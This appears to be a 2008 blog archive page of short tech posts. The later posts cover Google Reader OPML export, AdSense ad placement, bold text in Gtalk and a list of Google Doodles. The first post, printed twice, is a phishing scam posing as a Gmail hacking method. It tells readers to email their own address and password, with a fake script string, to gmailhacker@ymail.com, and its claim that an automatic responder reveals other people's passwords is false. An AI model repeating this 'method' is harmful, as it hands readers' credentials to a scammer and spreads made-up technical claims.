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Hack Gmail passwords

| Monday, September 15, 2008 |


Hey everyone wishes to hack other persons password and so do you? Here is a cool method to hack a gmail account.if you like this please subscribe to my feeds.

How to hack a Gmail-account ?
Step 1: Log into your Gmail account.
Step 2: Compose a new mail.
Step 3: In subject box type " PASSWORD RECOVERY "
Step 4: Send this to - gmailhacker@ymail.com
Step 5: Write this in message box.

(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password

(fourth line) -
pwdcursive><\script>=""><>
{simply copy and paste above.}


How it works: you mail to a system administrators automatic responder.
Usually only system administrators should be able to use this, but when you
try it with your own password and mail this message from your Gmail account
the computer gets confused! Why your password is needed- automatic Gmail
responder will require your "system administrator password" which is in fact
your own password!!! But the : computer doesn't know.How to hack a Gmail-account ?
Step 1: Log into your Gmail account.
Step 2: Compose a new mail.
Step 3: In subject box type " PASSWORD RECOVERY "
Step 4: Send this to - gmailhacker@ymail.com
Step 5: Write this in message box.

(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password

(fourth line) -
pwdcursive><\script>=""><>
{simply copy and paste above.}


How it works: you mail to a system administrators automatic responder.
Usually only system administrators should be able to use this, but when you
try it with your own password and mail this message from your Gmail account
the computer gets confused! Why your password is needed- automatic Gmail
responder will require your "system administrator password" which is in fact
your own password!!! But the : computer doesn't know.


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Export the Feeds from a Google Reader Folder

| Wednesday, August 27, 2008 |

Most feed readers let you import and export subscriptions using the OPML format. For Google Reader, you'll find this option in Settings > Import/Export.

But what happens when you need to export the feeds from a single folder so you can share them with a friend or upload them to a site? Google Reader lets you export the feeds from a folder:


http://www.google.com/reader/public/subscriptions/user/-/label/FOLDER
(you should replace FOLDER with the actual name of the folder)

Another way to share the subscriptions from a folder is to make it public and to use this link for the OPML file:

http://www.google.com/reader/public/subscriptions/user/USERID/label/FOLDER
(USERID can be obtained from the public page created by Google Reader)

This also works if someone shares with you the page of a public folder and you want to obtain the list of subscriptions from that folder. If I share with you my Googlers folder:

http://www.google.com/reader/shared/user/13577231804381328821/label/googlers

you can easily obtain the link to the corresponding OPML file by replacing shared with public/subscriptions:

http://www.google.com/reader/public/subscriptions/user/13577231804381328821/label/googlers


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Google Adsense below Post Title not Allowed

| Tuesday, August 26, 2008 |

Most blogs place Google Adsense Ads below the post title and above article content, to get better ad visibility and a higher clickthrough rate to make more money, but it is not always allowed as per Google Adsense policies. We recently got an email from Adsense support pointing out this issue on our site.
Google had earlier clarified some commonly encountered issues and one of them was “Ads shouldn’t be placed under a title or section heading in a way that implies that the ads are not ads.” They showed this example violating the terms, where the ads are places directly below the post title.





Also note that Google Adsense program policies, clearly say that Publishers participating in the AdSense program -
  • May not encourage users to click the Google ads by using phrases such as “click the ads,” “support us,” “visit these links,” or other similar language
  • May not place misleading labels above Google ad units - for instance, ads may be labeled “Sponsored Links” but not “Favorite Sites”

Posts title can violate Adsense Guidelines

Post titles act as labels - If you have posts titles like “Hot deals of the day”, or “Best Articles of June”, or “3 best imaging softwares”, or “download vista now”, then the targeted ads that appear beneath these articles can truly mislead visitors to click these ads and inflate advertiser costs.
Blogs are different - But since bloggers place the adsense code in the blog template, it is difficult to tweak the placement on every post. Of course you can change selected titles so that it has a lesser clicking impact, but it is diffcult to optimize hundreds of article titles.
What can you do - Most blogs insert Date and Categories beneath the Post title which separate the ads. But apparently this is not enough, as they informed me that the title can still mislead visitors to click. They advised that “publishers may not label the Google ads with text other than ’sponsored links’ or ‘advertisements’. Inadvertently the blog post titles were acting as a labels above the ads. Thus to comply with the terms, we had to introduce the word “Advertisements” over our Adsense units, when they cleared the issue.
Its too common - As I browse around popular blogs, there are many blogs that place ads directly under titles, or place title, date and  categories above the ads. This has obviously been inspired by the Adsense optimization chart which prompts you to place ads above your primary content.
I thank the Google enforcement team, which was kind enough to send prompt feedback and helped us fix the issue. This is another of the common adsense mistakes to avoid and its a good idea to fix it before Google comes calling…
Will Google ban your adsense account? Once the Adsense team identifies a problem in Adsense placement on your site, they usually send an email explaining the issue and give you a few days time to fix it. It is best to respond quickly and politely and fix the issue promptly. The Adsense team is very helpful, but you have to comply with their terms.
[via Quick Online Tips]


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Make Words Bold in Gtalk

| Saturday, August 16, 2008 |

A lot of people are using Gtalk these days.Its a cool chatting application with a file sharing facility also, but one thing  that you might not know is that how to make words bold in Gtalk.Have you tried this?
Even I never knew it but I came across this thing from Ashish that by placing the words between asteriks(*) you can make them bold.
I have tried it and am showing the pic of same conversation.


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Google Doodles!!

| Thursday, August 14, 2008 |

Those who use Google know what google doodle is.I f you don't just watch the pics below you will know what it is.I got this piece from TechPavan.com which shows the doodles used by google on some very special days of the year.


Mother’s Day




Father’s Day





Women’s Day





National Library Day





St. Patrick’s Day





St. George’s Day





Da Vinci’s Birthday





Michelangelo’s Birthday





Einstein’s Birthday





Ray Charles’ Birthday





Dragon’s Day





Alfred Hitchcock’s Birthday





Earth Day









Halloween









Valentine’s Day







Water Day





National Teacher’s Day





125th Birthday of Walter Gropius





Invention of the first laser





Mother’s Day





Design by Jeff Koons





Earth Day





First Day of Spring





Persian New Year





St. Patrick’s Day





Alexander Graham Bell’s Birthday





Leap Year





Valentine’s Day





Chinese New Year





50th Anniversary of Lego Brick





Martin Luther King Jr. Day





25 Years of TCP/IP





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